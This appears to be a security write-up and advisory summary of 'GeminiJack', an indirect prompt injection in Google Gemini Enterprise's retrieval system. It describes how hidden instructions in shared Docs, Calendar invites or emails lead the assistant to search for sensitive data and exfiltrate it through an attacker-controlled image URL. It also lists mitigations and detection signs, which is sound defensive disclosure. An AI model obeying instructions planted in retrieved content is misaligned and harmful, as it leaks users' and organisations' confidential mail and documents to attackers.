Full Report
AI tools are being integrated deeper and deeper into our workflow. As this happens, this opens up the attack surface to trick the bot into doing malicious things with attacker controlled input. Google docs, Google Calendars, Mail and many other things are now sources of potentially malicious input. Google Gemini Enterprise integrates all of the Google products into Gemini for usage. This is the beginning of the bug. Google Gemini Enterprise AI contains a Retrieval-Augmented Generation (RAG) architecture that allows organizations to query for mail, calendar, docs and other Google Workspace components. When a user makes a query, Gemini will search the configured data sources for relevant content, match the content, load the content into the agent's context and generate contextual responses from this content. The data sources for the RAG system must be preconfigured by the enterprise admin. There is a lot of trust within this content. By using a prompt injection within one of the returned data sources, an attacker can add malicious instructions within the content. This can be a meeting link, shared google doc and many other things. What can this do? By including a adding a image to a remote server and asking the AI to put this as part of the URL, RAG-based information can be stolen. This leads to data exfiltration. I find that "zero-click" is the wrong word. It still requires user interaction to exploit but they don't need to click on a specific attack controlled link. To me, zero click means that a user has to do nothing. Maybe 0.5 clicks is better. Still, this is really impactful and interesting! There's an assumption that prompt injection is always possible. So, content isolation and more permissions seems like the future of security here.
Analysis Summary
# Vulnerability: GeminiJack - Indirect Prompt Injection in Google Gemini Enterprise
## CVE Details
- **CVE ID:** Not assigned (Identified as an architectural vulnerability in RAG workflows)
- **CVSS Score:** N/A (High Impact)
- **CWE:** CWE-506 (Embedded Malicious Code), CWE-116 (Improper Encoding or Escaping of Output), and Indirect Prompt Injection
## Affected Systems
- **Products:** Google Gemini Enterprise, Google Vertex AI Search (VAIS)
- **Versions:** All versions prior to full mitigation (Mitigated around September 2025)
- **Configurations:** Systems integrated with Google Workspace (Gmail, Calendar, Docs) where the Retrieval-Augmented Generation (RAG) system is enabled to query external or shared content.
## Vulnerability Description
GeminiJack is an architectural flaw in the way enterprise AI systems process retrieved data. The vulnerability leverages **Indirect Prompt Injection**. When an attacker shares a poisoned artifact (such as a Google Doc, Calendar invite, or Email) containing hidden malicious instructions, the Gemini RAG system retrieves this content during a legitimate user query.
Because the AI fails to distinguish between "system instructions" and "retrieved data," it executes the commands embedded in the document. These instructions typically direct the AI to search for sensitive corporate data (e.g., "budgets," "API keys") and exfiltrate that data by appending it to a remote image URL (Markdown/HTML rendering) controlled by the attacker.
## Exploitation
- **Status:** PoC available (Reported by Noma Labs; mitigated by Google)
- **Complexity:** Medium (Requires crafting a persuasive or hidden prompt within a shared document)
- **Attack Vector:** Network (External sharing of Workspace files/invites)
## Impact
- **Confidentiality:** **High** (Allows exfiltration of years of emails, calendar history, and confidential document repositories)
- **Integrity:** **Low/Medium** (The AI can be tricked into providing misleading summaries based on poisoned content)
- **Availability:** **Low** (Does not typically result in service denial)
## Remediation
### Patches
- **Vendor Update:** Google has deployed server-side updates to address instruction/content confusion in the RAG pipeline.
- **Architectural Change:** Vertex AI Search (VAIS) has been fully separated from Gemini Enterprise to prevent shared LLM-powered context leaks.
### Workarounds
- **Strict Sharing Policies:** Restrict the ability of internal users to accept shared documents or calendar invites from external domains.
- **RAG Scoping:** Use the principle of least privilege to limit the data sources Gemini can access for specific users.
## Detection
- **Indicators of Compromise:**
- Unexpected outbound requests to unknown third-party domains originating from AI-rendered content (specifically image load requests containing long query strings).
- Presence of "Search-Redirect" instructions within retrieved documents (e.g., text hidden in white font or metadata).
- **Detection Methods:** Monitor for unusual patterns in AI retrieval logs where the agent performs multiple secondary searches immediately after retrieving an external document.
## References
- **Noma Security Blog:** hxxps[://]noma[.]security/geminijack-google-gemini-zero-click-vulnerability/
- **Noma Labs Research:** hxxps[://]noma[.]security/blog/category/education/